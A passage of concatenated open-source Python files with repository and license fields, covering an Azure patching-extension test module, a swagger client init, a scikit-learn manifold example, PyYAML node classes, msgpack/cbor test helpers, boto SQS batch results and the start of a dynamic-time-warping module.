        raise ValueError(error_msg)
def download_blob(storage_account_name, storage_account_key,
                  blob_uri, dst, hutil):
    """Download an Azure storage blob to this sequence's download dir as *dst*.

    Returns the local download path; logs and re-raises on any failure.
    """
    seqNo = hutil.get_seq_no()
    container_name = get_container_name_from_uri(blob_uri)
    blob_name = get_blob_name_from_uri(blob_uri)
    download_dir = prepare_download_dir(seqNo)
    download_path = os.path.join(download_dir, dst)
    #Guest agent already ensure the plugin is enabled one after another.
    #The blob download will not conflict.
    blob_service = BlobService(storage_account_name, storage_account_key)
    try:
        blob_service.get_blob_to_path(container_name, blob_name, download_path)
    except Exception as e:
        hutil.log_and_syslog(logging.ERROR, ("Failed to download blob with uri:{0} "
            "with error {1}").format(blob_uri,e))
        raise
    return download_path
def download_external_file(uri, dst, hutil):
    """Download *uri* into this sequence's download directory as *dst*.

    Returns the local file path; logs and re-raises on failure.
    """
    target = os.path.join(prepare_download_dir(hutil.get_seq_no()), dst)
    try:
        download_and_save_file(uri, target)
    except Exception as exc:
        hutil.log_and_syslog(logging.ERROR, ("Failed to download external file with uri:{0} "
                                             "with error {1}").format(uri, exc))
        raise
    return target
def save_local_file(src, dst, hutil):
    """Write inline script content *src* into the download dir as file *dst*.

    Returns the local file path; logs and re-raises on failure.
    """
    target = os.path.join(prepare_download_dir(hutil.get_seq_no()), dst)
    try:
        waagent.SetFileContents(target, src)
    except Exception as exc:
        hutil.log_and_syslog(logging.ERROR, ("Failed to save file from user's configuration "
                                             "with error {0}").format(exc))
        raise
    return target
def preprocess_files(file_path, hutil):
    """Normalize a downloaded script: skip binaries, convert CRLF, strip BOM."""
    is_text_flag, code_type = is_text_file(file_path)
    if not is_text_flag:
        # Binary content is left untouched.
        return
    dos2unix(file_path)
    hutil.log_and_syslog(logging.INFO, "Converting text files from DOS to Unix formats: Done")
    if code_type in ['UTF-8', 'UTF-16LE', 'UTF-16BE']:
        remove_bom(file_path)
        hutil.log_and_syslog(logging.INFO, "Removing BOM: Done")
def is_text_file(file_path):
    """Sniff the first 512 bytes of *file_path*; return (is_text, encoding)."""
    with open(file_path, 'rb') as f:
        head = f.read(512)
    return is_text(head)
def is_text(contents):
    """Classify a byte string via chardet; return (is_supported_text, encoding)."""
    supported_encoding = ('ascii', 'UTF-8', 'UTF-16LE', 'UTF-16BE')
    code_type = chardet.detect(contents)['encoding']
    return code_type in supported_encoding, code_type
def dos2unix(file_path):
    """Convert *file_path* from DOS/Mac (CRLF/CR) to Unix (LF) line endings.

    Writes to a temporary file first and then replaces the original, so a
    failure mid-way never leaves a half-converted file behind.

    Fixes two defects in the original: the file descriptor returned by
    tempfile.mkstemp() was never closed (fd leak), and the 'rU' open mode it
    relied on was removed in Python 3.11. Binary replacement of CRLF and lone
    CR reproduces universal-newline translation exactly.
    """
    with open(file_path, 'rb') as f:
        contents = f.read()
    contents = contents.replace(b'\r\n', b'\n').replace(b'\r', b'\n')
    fd, temp_file_path = tempfile.mkstemp()
    try:
        with os.fdopen(fd, 'wb') as f_temp:
            f_temp.write(contents)
    except Exception:
        os.remove(temp_file_path)
        raise
    shutil.move(temp_file_path, file_path)
def remove_bom(file_path):
    """Strip a UTF-8/UTF-16 byte-order mark from *file_path*, re-encoding as UTF-8.

    Fixes two defects in the original: the tempfile.mkstemp() descriptor was
    leaked, and when neither codec could decode the contents the file was
    replaced with the empty temp file, destroying its data. Undecodable
    contents are now copied through unchanged.
    """
    with open(file_path, 'rb') as f:
        contents = f.read()
    converted = contents  # fall back to the original bytes on decode failure
    for encoding in ("utf-8-sig", "utf-16"):
        try:
            converted = contents.decode(encoding).encode('utf-8')
            break
        except UnicodeDecodeError:
            continue
    fd, temp_file_path = tempfile.mkstemp()
    try:
        with os.fdopen(fd, 'wb') as f_temp:
            f_temp.write(converted)
    except Exception:
        os.remove(temp_file_path)
        raise
    shutil.move(temp_file_path, file_path)
def download_and_save_file(uri, file_path):
    """Stream *uri* to *file_path* in 1 KiB chunks.

    Fixes the original's resource leak: neither the URL handle nor the
    destination file was ever closed.
    """
    buf_size = 1024
    src = urllib2.urlopen(uri)
    try:
        with open(file_path, 'wb') as dest:
            buf = src.read(buf_size)
            while buf:
                dest.write(buf)
                buf = src.read(buf_size)
    finally:
        src.close()
def prepare_download_dir(seqNo):
    """Return (creating it if needed) the download dir for sequence *seqNo*."""
    download_dir = os.path.join(os.getcwd(), DownloadDirectory, seqNo)
    # makedirs-based helper creates the parent DownloadDirectory level too.
    create_directory_if_not_exists(download_dir)
    return download_dir
def create_directory_if_not_exists(directory):
    """Create *directory* (including parents) unless the path already exists."""
    if os.path.exists(directory):
        return
    os.makedirs(directory)
def get_path_from_uri(uriStr):
    """Return the path component of URI string *uriStr*."""
    return urlparse.urlparse(uriStr).path
def get_blob_name_from_uri(uri):
    """Return the blob name embedded in an Azure blob *uri*."""
    return get_properties_from_uri(uri)['blob_name']

def get_container_name_from_uri(uri):
    """Return the container name embedded in an Azure blob *uri*."""
    return get_properties_from_uri(uri)['container_name']
def get_properties_from_uri(uri):
    """Split an Azure blob *uri* path into container and blob names.

    Returns a dict with 'container_name' and 'blob_name'.

    Fixes two defects in the original: a path without a '/' separator was
    logged as an error but execution fell through and returned garbage (the
    whole path as blob name, a truncated copy as container); and `path[0]`
    raised IndexError on an empty path. Malformed paths now raise ValueError.
    """
    path = get_path_from_uri(uri)
    if path.endswith('/'):
        path = path[:-1]
    if path.startswith('/'):
        path = path[1:]
    first_sep = path.find('/')
    if first_sep == -1:
        hutil.log_and_syslog(logging.ERROR, "Failed to extract container, blob, from {}".format(path))
        raise ValueError("Invalid blob uri: {0}".format(uri))
    return {'blob_name': path[first_sep + 1:],
            'container_name': path[:first_sep]}
def download_customized_vmstatustest():
    """Download the VMStatusTest scripts, retrying up to twice on failure."""
    maxRetry = 2
    for retry in range(maxRetry + 1):
        try:
            download_files(hutil)
            return
        except Exception:
            hutil.log_and_syslog(logging.ERROR, "Failed to download files, retry=" + str(retry) + ", maxRetry=" + str(maxRetry))
            if retry == maxRetry:
                # Out of attempts — propagate the last failure.
                raise
            hutil.log_and_syslog(logging.INFO, "Sleep 10 seconds")
            time.sleep(10)
def copy_vmstatustestscript(seqNo, oneoff):
    """Copy downloaded VMStatusTest scripts into the oneoff/ or scheduled/ dir."""
    src_dir = prepare_download_dir(seqNo)
    is_oneoff = oneoff is not None and oneoff.lower() == "true"
    dst_dir = os.path.join(os.getcwd(), "oneoff" if is_oneoff else "scheduled")
    for filename in (idleTestScriptName, healthyTestScriptName):
        src = os.path.join(src_dir, filename)
        if os.path.isfile(src):
            shutil.copy(src, dst_dir)
def delete_current_vmstatustestscript():
    """Remove any VMStatusTest scripts left in the patch/ working directory."""
    patch_dir = os.path.join(os.getcwd(), "patch")
    for filename in (idleTestScriptName, healthyTestScriptName):
        script = os.path.join(patch_dir, filename)
        if os.path.isfile(script):
            os.remove(script)
class Test(unittest.TestCase):
    """End-to-end tests of the patching handler built on FakePatching.

    These tests are timing-sensitive: each schedules a patch run a few
    minutes ahead and sleeps across its stages to assert the stop flag
    and the download/patch bookkeeping files.
    """

    def setUp(self):
        print('\n\n============================================================================================')
        waagent.LoggerInit('/var/log/waagent.log', '/dev/stdout')
        waagent.Log("%s started to handle." %(ExtensionShortName))
        global hutil
        hutil = Util.HandlerUtility(waagent.Log, waagent.Error,
                                    ExtensionShortName)
        hutil.do_parse_context('TEST')
        global MyPatching
        MyPatching = FakePatching(hutil)
        if MyPatching is None:
            sys.exit(1)
        distro = DistInfo()[0]
        if 'centos' in distro or 'Oracle' in distro or 'redhat' in distro:
            MyPatching.cron_restart_cmd = 'service crond restart'
        # Start every test from a clean sequence/bookkeeping state.
        try:
            os.remove('mrseq')
        except:
            pass
        waagent.SetFileContents(MyPatching.package_downloaded_path, '')
        waagent.SetFileContents(MyPatching.package_patched_path, '')

    def test_stop_between_download_and_stage1(self):
        print('test_stop_between_download_and_stage1')
        global settings
        current_time = time.time()
        settings = change_settings("startTime", time.strftime('%H:%M', time.localtime(current_time + 180)))
        settings = change_settings("category", "importantandrecommended")
        old_log_len = len(waagent.GetFileContents(log_file))
        delta_time = int(time.strftime('%S', time.localtime(current_time + 120)))
        with self.assertRaises(SystemExit) as cm:
            enable()
        self.assertEqual(cm.exception.code, 0)
        # set stop flag after downloaded 40 seconds
        time.sleep(160 - delta_time)
        os.remove('mrseq')
        settings = change_settings("stop", "true")
        with self.assertRaises(SystemExit) as cm:
            enable()
        self.assertEqual(cm.exception.code, 0)
        self.assertTrue(MyPatching.exists_stop_flag())
        # Make sure the total sleep time is greater than 180s
        time.sleep(20 + delta_time + 5 + 60)
        self.assertFalse(MyPatching.exists_stop_flag())
        download_list = get_patch_list(MyPatching.package_downloaded_path)
        self.assertEqual(download_list, ['a', 'b', 'c', 'd', 'e', '1', '2', '3', '4'])
        self.assertFalse(waagent.GetFileContents(MyPatching.package_patched_path))
        log_contents = waagent.GetFileContents(log_file)[old_log_len:]
        self.assertTrue('Installing patches is stopped/canceled' in log_contents)
        restore_settings()

    def test_stop_between_stage1_and_stage2(self):
        # Consistency fix: the original used a bare Python-2 print statement
        # here while the rest of the file uses the print(...) form.
        print('test_stop_between_stage1_and_stage2')
        global settings
        current_time = time.time()
        settings = change_settings("startTime", time.strftime('%H:%M', time.localtime(current_time + 180)))
        settings = change_settings("category", "importantandrecommended")
        old_log_len = len(waagent.GetFileContents(log_file))
        delta_time = int(time.strftime('%S', time.localtime(current_time)))
        with self.assertRaises(SystemExit) as cm:
            enable()
        self.assertEqual(cm.exception.code, 0)
        # Set stop flag after patched 10 seconds
        # Meanwhile the extension is sleeping between stage 1 & 2
        time.sleep(180 - delta_time + 10)
        os.remove('mrseq')
        settings = change_settings("stop", "true")
        with self.assertRaises(SystemExit) as cm:
            enable()
        self.assertEqual(cm.exception.code, 0)
        self.assertTrue(MyPatching.exists_stop_flag())
        # The patching (stage 1 & 2) has ended
        time.sleep(20)
        self.assertFalse(MyPatching.exists_stop_flag())
        download_list = get_patch_list(MyPatching.package_downloaded_path)
        self.assertEqual(download_list, ['a', 'b', 'c', 'd', 'e', '1', '2', '3', '4'])
        patch_list = get_patch_list(MyPatching.package_patched_path)
        self.assertEqual(patch_list, ['a', 'b', 'c', 'd', 'e'])
        log_contents = waagent.GetFileContents(log_file)[old_log_len:]
        self.assertTrue("Installing patches (Category:" + MyPatching.category_all + ") is stopped/canceled" in log_contents)
        restore_settings()
def get_patch_list(file_path, category=None):
    """Parse a patch bookkeeping file into a list of patch names.

    Each useful line looks like '<name> <category>'. When *category* is given
    only lines ending with it are kept; otherwise every two-field line is.
    """
    content = waagent.GetFileContents(file_path)
    if category is not None:
        return [line.split()[0] for line in content.split('\n') if line.endswith(category)]
    return [line.split()[0] for line in content.split('\n') if ' ' in line]
def get_status(operation, retkey='status'):
    """Return *retkey* from the status file when it reports *operation*, else ''."""
    contents = waagent.GetFileContents(status_file)
    status = json.loads(contents)[0]['status']
    if status['operation'] != operation:
        return ''
    return status[retkey]
def change_settings(key, value):
    """Set *key* to *value* in the settings file and return the new settings dict."""
    with open(settings_file, "r") as f:
        settings = json.loads(f.read())
    settings[key] = value
    with open(settings_file, "w") as f:
        f.write(json.dumps(settings))
    return settings
def restore_settings():
    """Rewrite default.settings with the baseline test configuration."""
    # Inline scripts used when vmStatusTest.local is "true".
    idleTestScriptLocal = """#!/usr/bin/python
# Locally.
def is_vm_idle():
    return True
"""
    healthyTestScriptLocal = """#!/usr/bin/python
# Locally.
def is_vm_healthy():
    return True
"""
    settings = {
        "disabled" : "false",
        "stop" : "false",
        "rebootAfterPatch" : "rebootifneed",
        "category" : "important",
        "installDuration" : "00:30",
        "oneoff" : "false",
        "intervalOfWeeks" : "1",
        "dayOfWeek" : "everyday",
        "startTime" : "03:00",
        "vmStatusTest" : {
            "local" : "true",
            "idleTestScript" : idleTestScriptLocal, #idleTestScriptStorage,
            "healthyTestScript" : healthyTestScriptLocal, #healthyTestScriptStorage
        },
        "storageAccountName" : "<TOCHANGE>",
        "storageAccountKey" : "<TOCHANGE>"
    }
    settings_string = json.dumps(settings)
    settings_file = "default.settings"
    with open(settings_file, "w") as f:
        f.write(settings_string)
def main():
    """Entry point: run the unit tests with no args, else dispatch an operation."""
    if len(sys.argv) == 1:
        unittest.main()
        return
    waagent.LoggerInit('/var/log/waagent.log', '/dev/stdout')
    waagent.Log("%s started to handle." % ExtensionShortName)
    global hutil
    hutil = Util.HandlerUtility(waagent.Log, waagent.Error,
                                ExtensionShortName)
    hutil.do_parse_context('TEST')
    global MyPatching
    MyPatching = FakePatching(hutil)
    if MyPatching is None:
        sys.exit(1)
    # Arguments may carry '-'/'/' prefixes; the first matching verb per
    # argument wins, and several operations may run in one invocation.
    for a in sys.argv[1:]:
        if re.match("^([-/]*)(disable)", a):
            disable()
        elif re.match("^([-/]*)(uninstall)", a):
            uninstall()
        elif re.match("^([-/]*)(install)", a):
            install()
        elif re.match("^([-/]*)(enable)", a):
            enable()
        elif re.match("^([-/]*)(update)", a):
            update()
        elif re.match("^([-/]*)(download)", a):
            download()
        elif re.match("^([-/]*)(patch)", a):
            patch()
        elif re.match("^([-/]*)(oneoff)", a):
            oneoff()

if __name__ == '__main__':
    main()
| apache-2.0 |
garywong89/PetStoreAPI | python/swagger_client/__init__.py | 1 | 2217 | # coding: utf-8
"""
DeliveryHub
DeliveryHub API
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
# import models into sdk package
from .models.account import Account
from .models.account_role import AccountRole
from .models.account_status import AccountStatus
from .models.agent import Agent
from .models.agent_billing import AgentBilling
from .models.agent_fleet import AgentFleet
from .models.agent_type import AgentType
from .models.area import Area
from .models.auth_credentials import AuthCredentials
from .models.auth_pin import AuthPin
from .models.auth_token import AuthToken
from .models.callback_uri import CallbackUri
from .models.city import City
from .models.coordinates import Coordinates
from .models.country import Country
from .models.country_code import CountryCode
from .models.date_time import DateTime
from .models.email import Email
from .models.merchant import Merchant
from .models.mobile_phone import MobilePhone
from .models.new_status import NewStatus
from .models.object_id import ObjectId
from .models.order import Order
from .models.order_details import OrderDetails
from .models.order_details_items import OrderDetailsItems
from .models.schedule import Schedule
from .models.shop import Shop
from .models.street_address import StreetAddress
from .models.team import Team
from .models.time_zone import TimeZone
# import apis into sdk package
from .apis.default_api import DefaultApi
# import ApiClient
from .api_client import ApiClient
from .configuration import Configuration
configuration = Configuration()
| apache-2.0 |
siutanwong/scikit-learn | examples/manifold/plot_manifold_sphere.py | 258 | 5101 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=============================================
Manifold Learning methods on a severed sphere
=============================================
An application of the different :ref:`manifold` techniques
on a spherical data-set. Here one can see the use of
dimensionality reduction in order to gain some intuition
regarding the manifold learning methods. Regarding the dataset,
the poles are cut from the sphere, as well as a thin slice down its
side. This enables the manifold learning techniques to
'spread it open' whilst projecting it onto two dimensions.
For a similar example, where the methods are applied to the
S-curve dataset, see :ref:`example_manifold_plot_compare_methods.py`
Note that the purpose of the :ref:`MDS <multidimensional_scaling>` is
to find a low-dimensional representation of the data (here 2D) in
which the distances respect well the distances in the original
high-dimensional space, unlike other manifold-learning algorithms,
it does not seeks an isotropic representation of the data in
the low-dimensional space. Here the manifold problem matches fairly
that of representing a flat map of the Earth, as with
`map projection <http://en.wikipedia.org/wiki/Map_projection>`_
"""
# Author: Jaques Grobler <jaques.grobler@inria.fr>
# License: BSD 3 clause
print(__doc__)
from time import time
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.ticker import NullFormatter
from sklearn import manifold
from sklearn.utils import check_random_state
# Next line to silence pyflakes.
Axes3D
# Variables for manifold learning.
n_neighbors = 10
n_samples = 1000

# Create our sphere.
random_state = check_random_state(0)
# p: azimuthal angle with a 0.55 rad slice removed; t: polar angle.
p = random_state.rand(n_samples) * (2 * np.pi - 0.55)
t = random_state.rand(n_samples) * np.pi

# Sever the poles from the sphere.
indices = ((t < (np.pi - (np.pi / 8))) & (t > ((np.pi / 8))))
colors = p[indices]
# Spherical -> Cartesian coordinates for the retained points.
x, y, z = np.sin(t[indices]) * np.cos(p[indices]), \
    np.sin(t[indices]) * np.sin(p[indices]), \
    np.cos(t[indices])
# Plot our dataset.
fig = plt.figure(figsize=(15, 8))
# Use n_samples instead of the hard-coded 1000 so the title stays correct
# if the sample count is changed above.
plt.suptitle("Manifold Learning with %i points, %i neighbors"
             % (n_samples, n_neighbors), fontsize=14)

ax = fig.add_subplot(251, projection='3d')
ax.scatter(x, y, z, c=p[indices], cmap=plt.cm.rainbow)
try:
    # compatibility matplotlib < 1.0
    ax.view_init(40, -10)
except:
    pass

sphere_data = np.array([x, y, z]).T

# Perform Locally Linear Embedding Manifold learning
methods = ['standard', 'ltsa', 'hessian', 'modified']
labels = ['LLE', 'LTSA', 'Hessian LLE', 'Modified LLE']

# One 2-D embedding per LLE variant, plotted in slots 2-5 of the 2x5 grid.
for i, method in enumerate(methods):
    t0 = time()
    trans_data = manifold\
        .LocallyLinearEmbedding(n_neighbors, 2,
                                method=method).fit_transform(sphere_data).T
    t1 = time()
    print("%s: %.2g sec" % (methods[i], t1 - t0))

    ax = fig.add_subplot(252 + i)
    plt.scatter(trans_data[0], trans_data[1], c=colors, cmap=plt.cm.rainbow)
    plt.title("%s (%.2g sec)" % (labels[i], t1 - t0))
    ax.xaxis.set_major_formatter(NullFormatter())
    ax.yaxis.set_major_formatter(NullFormatter())
    plt.axis('tight')

# Perform Isomap Manifold learning.
t0 = time()
trans_data = manifold.Isomap(n_neighbors, n_components=2)\
    .fit_transform(sphere_data).T
t1 = time()
print("%s: %.2g sec" % ('ISO', t1 - t0))

ax = fig.add_subplot(257)
plt.scatter(trans_data[0], trans_data[1], c=colors, cmap=plt.cm.rainbow)
plt.title("%s (%.2g sec)" % ('Isomap', t1 - t0))
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
plt.axis('tight')

# Perform Multi-dimensional scaling.
t0 = time()
mds = manifold.MDS(2, max_iter=100, n_init=1)
trans_data = mds.fit_transform(sphere_data).T
t1 = time()
print("MDS: %.2g sec" % (t1 - t0))

ax = fig.add_subplot(258)
plt.scatter(trans_data[0], trans_data[1], c=colors, cmap=plt.cm.rainbow)
plt.title("MDS (%.2g sec)" % (t1 - t0))
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
plt.axis('tight')

# Perform Spectral Embedding.
t0 = time()
se = manifold.SpectralEmbedding(n_components=2,
                                n_neighbors=n_neighbors)
trans_data = se.fit_transform(sphere_data).T
t1 = time()
print("Spectral Embedding: %.2g sec" % (t1 - t0))

ax = fig.add_subplot(259)
plt.scatter(trans_data[0], trans_data[1], c=colors, cmap=plt.cm.rainbow)
plt.title("Spectral Embedding (%.2g sec)" % (t1 - t0))
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
plt.axis('tight')
# Perform t-distributed stochastic neighbor embedding.
t0 = time()
tsne = manifold.TSNE(n_components=2, init='pca', random_state=0)
trans_data = tsne.fit_transform(sphere_data).T
t1 = time()
print("t-SNE: %.2g sec" % (t1 - t0))

# Fix: add_subplot(250) is an invalid three-digit subplot spec (index 0
# does not exist); the t-SNE panel belongs in slot 10 of the 2x5 grid.
ax = fig.add_subplot(2, 5, 10)
plt.scatter(trans_data[0], trans_data[1], c=colors, cmap=plt.cm.rainbow)
plt.title("t-SNE (%.2g sec)" % (t1 - t0))
ax.xaxis.set_major_formatter(NullFormatter())
ax.yaxis.set_major_formatter(NullFormatter())
plt.axis('tight')

plt.show()
| bsd-3-clause |
f-guichard/cf-sample-php-buildpack-custo | lib/yaml/nodes.py | 985 | 1440 |
class Node(object):
    """Base class for YAML representation-graph nodes.

    A node pairs a resolved *tag* with a *value* and the source marks that
    delimit where it was parsed from.
    """

    def __init__(self, tag, value, start_mark, end_mark):
        self.tag = tag
        self.value = value
        self.start_mark = start_mark
        self.end_mark = end_mark

    def __repr__(self):
        # Show the concrete subclass name so Scalar/Sequence/Mapping nodes
        # are distinguishable in debug output.
        return '%s(tag=%r, value=%s)' % (self.__class__.__name__,
                                         self.tag, repr(self.value))
class ScalarNode(Node):
    """A node holding a single scalar value; *style* records its quoting style."""

    id = 'scalar'

    def __init__(self, tag, value,
                 start_mark=None, end_mark=None, style=None):
        Node.__init__(self, tag, value, start_mark, end_mark)
        self.style = style
class CollectionNode(Node):
    """Base for nodes whose value is a collection; *flow_style* records layout."""

    def __init__(self, tag, value,
                 start_mark=None, end_mark=None, flow_style=None):
        Node.__init__(self, tag, value, start_mark, end_mark)
        self.flow_style = flow_style
class SequenceNode(CollectionNode):
    """A collection node whose value is an ordered list of nodes."""
    id = 'sequence'

class MappingNode(CollectionNode):
    """A collection node whose value is a list of (key, value) node pairs."""
    id = 'mapping'
| apache-2.0 |
Khusbu/company-api-svc | vendor/github.com/ugorji/go/codec/test.py | 107 | 4029 | #!/usr/bin/env python
# This will create golden files in a directory passed to it.
# A Test calls this internally to create the golden files
# So it can process them (so we don't have to checkin the files).
# Ensure msgpack-python and cbor are installed first, using:
# sudo apt-get install python-dev
# sudo apt-get install python-pip
# pip install --user msgpack-python msgpack-rpc-python cbor
# Ensure all "string" keys are utf strings (else encoded as bytes)
import cbor, msgpack, msgpackrpc, sys, os, threading
def get_test_data_list():
    """Return the list of values serialized into the golden test files.

    l0 covers scalar primitives (ints of various widths, floats, bools,
    strings, None); l1 adds map/list combinations, including non-string keys.
    The final list is l0's items, then l0 itself as a nested list, then 1,
    then l1's items — the ordering the Go tests rely on.
    """
    # get list with all primitive types, and a combo type
    l0 = [
        -8,
        -1616,
        -32323232,
        -6464646464646464,
        192,
        1616,
        32323232,
        6464646464646464,
        192,
        -3232.0,
        -6464646464.0,
        3232.0,
        6464.0,
        6464646464.0,
        False,
        True,
        u"null",
        None,
        u"some&day>some<day",
        1328176922000002000,
        u"",
        -2206187877999998000,
        u"bytestring",
        270,
        u"none",
        -2013855847999995777,
        #-6795364578871345152,
        ]
    l1 = [
        { "true": True,
          "false": False },
        { "true": u"True",
          "false": False,
          "uint16(1616)": 1616 },
        { "list": [1616, 32323232, True, -3232.0, {"TRUE":True, "FALSE":False}, [True, False] ],
          "int32":32323232, "bool": True,
          "LONG STRING": u"123456789012345678901234567890123456789012345678901234567890",
          "SHORT STRING": u"1234567890" },
        { True: "true", 138: False, "false": 200 }
        ]
    l = []
    l.extend(l0)
    l.append(l0)
    l.append(1)
    l.extend(l1)
    return l
def build_test_data(destdir):
    """Serialize each test value to <i>.msgpack.golden and <i>.cbor.golden in *destdir*.

    Fixes the original's resource leak: file handles were opened/closed by
    hand and leaked if a write raised.
    """
    l = get_test_data_list()
    for i in range(len(l)):
        # packer = msgpack.Packer()
        with open(os.path.join(destdir, str(i) + '.msgpack.golden'), 'wb') as f:
            f.write(msgpack.dumps(l[i]))
        with open(os.path.join(destdir, str(i) + '.cbor.golden'), 'wb') as f:
            f.write(cbor.dumps(l[i]))
def doRpcServer(port, stopTimeSec):
    """Run a msgpack-rpc echo server on localhost:*port*.

    When *stopTimeSec* > 0 a timer thread stops the server after that many
    seconds; otherwise it runs until interrupted.
    """
    class EchoHandler(object):
        def Echo123(self, msg1, msg2, msg3):
            return ("1:%s 2:%s 3:%s" % (msg1, msg2, msg3))
        def EchoStruct(self, msg):
            return ("%s" % msg)
    addr = msgpackrpc.Address('localhost', port)
    server = msgpackrpc.Server(EchoHandler())
    server.listen(addr)
    # run thread to stop it after stopTimeSec seconds if > 0
    if stopTimeSec > 0:
        def myStopRpcServer():
            server.stop()
        t = threading.Timer(stopTimeSec, myStopRpcServer)
        t.start()
    server.start()
def doRpcClientToPythonSvc(port):
    # Exercise the Python echo server with a plain and a struct payload.
    # NOTE: Python-2-only (bare print statements).
    address = msgpackrpc.Address('localhost', port)
    client = msgpackrpc.Client(address, unpack_encoding='utf-8')
    print client.call("Echo123", "A1", "B2", "C3")
    print client.call("EchoStruct", {"A" :"Aa", "B":"Bb", "C":"Cc"})
def doRpcClientToGoSvc(port):
    # Exercise the Go TestRpcInt service with the same two payloads.
    # NOTE: Python-2-only (bare print statements).
    # print ">>>> port: ", port, " <<<<<"
    address = msgpackrpc.Address('localhost', port)
    client = msgpackrpc.Client(address, unpack_encoding='utf-8')
    print client.call("TestRpcInt.Echo123", ["A1", "B2", "C3"])
    print client.call("TestRpcInt.EchoStruct", {"A" :"Aa", "B":"Bb", "C":"Cc"})
def doMain(args):
    """Dispatch the command-line mode to the matching helper, or print usage."""
    if len(args) == 2 and args[0] == "testdata":
        build_test_data(args[1])
    elif len(args) == 3 and args[0] == "rpc-server":
        doRpcServer(int(args[1]), int(args[2]))
    elif len(args) == 2 and args[0] == "rpc-client-python-service":
        doRpcClientToPythonSvc(int(args[1]))
    elif len(args) == 2 and args[0] == "rpc-client-go-service":
        doRpcClientToGoSvc(int(args[1]))
    else:
        print("Usage: test.py " +
              "[testdata|rpc-server|rpc-client-python-service|rpc-client-go-service] ...")

if __name__ == "__main__":
    doMain(sys.argv[1:])
| mit |
lckung/spark-ec2 | launch-script/lib/boto-2.34.0/boto/sqs/batchresults.py | 191 | 3515 | # Copyright (c) 2011 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2011 Eucalyptus Systems, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
A set of results returned by SendMessageBatch.
"""
class ResultEntry(dict):
    """
    The result (successful or unsuccessful) of a single
    message within a send_message_batch request.

    In the case of a successful result, this dict-like
    object will contain the following items:

    :ivar id: A string containing the user-supplied ID of the message.
    :ivar message_id: A string containing the SQS ID of the new message.
    :ivar message_md5: A string containing the MD5 hash of the message body.

    In the case of an error, this object will contain the following
    items:

    :ivar id: A string containing the user-supplied ID of the message.
    :ivar sender_fault: A boolean value.
    :ivar error_code: A string containing a short description of the error.
    :ivar error_message: A string containing a description of the error.
    """

    # Maps SAX element names to the dict keys they populate; unknown
    # elements are ignored, exactly as the original if/elif chain did.
    _ELEMENT_TO_KEY = {
        'Id': 'id',
        'MessageId': 'message_id',
        'MD5OfMessageBody': 'message_md5',
        'SenderFault': 'sender_fault',
        'Code': 'error_code',
        'Message': 'error_message',
    }

    def startElement(self, name, attrs, connection):
        return None

    def endElement(self, name, value, connection):
        key = self._ELEMENT_TO_KEY.get(name)
        if key is not None:
            self[key] = value
class BatchResults(object):
    """
    A container for the results of a send_message_batch request.

    :ivar results: A list of successful results. Each item in the
        list will be an instance of :class:`ResultEntry`.

    :ivar errors: A list of unsuccessful results. Each item in the
        list will be an instance of :class:`ResultEntry`.
    """

    def __init__(self, parent):
        self.parent = parent
        self.results = []
        self.errors = []

    def startElement(self, name, attrs, connection):
        # Route each entry element into the success or error bucket.
        if name.endswith('MessageBatchResultEntry'):
            bucket = self.results
        elif name == 'BatchResultErrorEntry':
            bucket = self.errors
        else:
            return None
        entry = ResultEntry()
        bucket.append(entry)
        return entry

    def endElement(self, name, value, connection):
        setattr(self, name, value)
| apache-2.0 |
laemp/gruschen | gruschen/metrics/dynamic_time_warping.py | 2 | 1226 | import math
import numpy as np
# dynamic time warping - squared
def get_metric(s, t):
    """Squared dynamic-time-warping distance between point sequences *s* and *t*."""
    dtw = _get_dtw_matrix(s, t, _point_cost_sqr)
    return dtw[-1, -1]
def _get_dtw_matrix(s, t, point_norm):
    """Fill the full (len(s), len(t)) DTW cost matrix for sequences *s* and *t*.

    *point_norm* maps a difference vector to a scalar point cost. Entry
    dtw[i, j] is the minimal accumulated cost of aligning s[:i+1] with
    t[:j+1] under the standard DTW recurrence.

    Change from the original: the dead `row = np.empty(m)` pre-allocation
    was removed — the name was immediately rebound to a matrix view inside
    the loop, so the buffer was never used.
    """
    n = len(s)
    m = len(t)
    dtw = np.empty((n, m))
    cost = np.empty(m)
    # First row: only horizontal moves are possible.
    _cost_vector(cost, s[0], t, point_norm)
    dtw[0, 0] = cost[0]
    for i in range(1, m):
        dtw[0, i] = dtw[0, i-1] + cost[i]
    # First column: only vertical moves are possible.
    for i in range(1, n):
        dtw[i, 0] = point_norm(s[i] - t[0]) + dtw[i-1, 0]
    for i in range(1, n):
        row = dtw[i, :]  # a view, so the helpers update dtw in place
        _cost_vector(cost, s[i], t[1:], point_norm)
        _row_prediction(row, cost, dtw[i-1, :])
        _row_adjustment(row, cost)
    return dtw
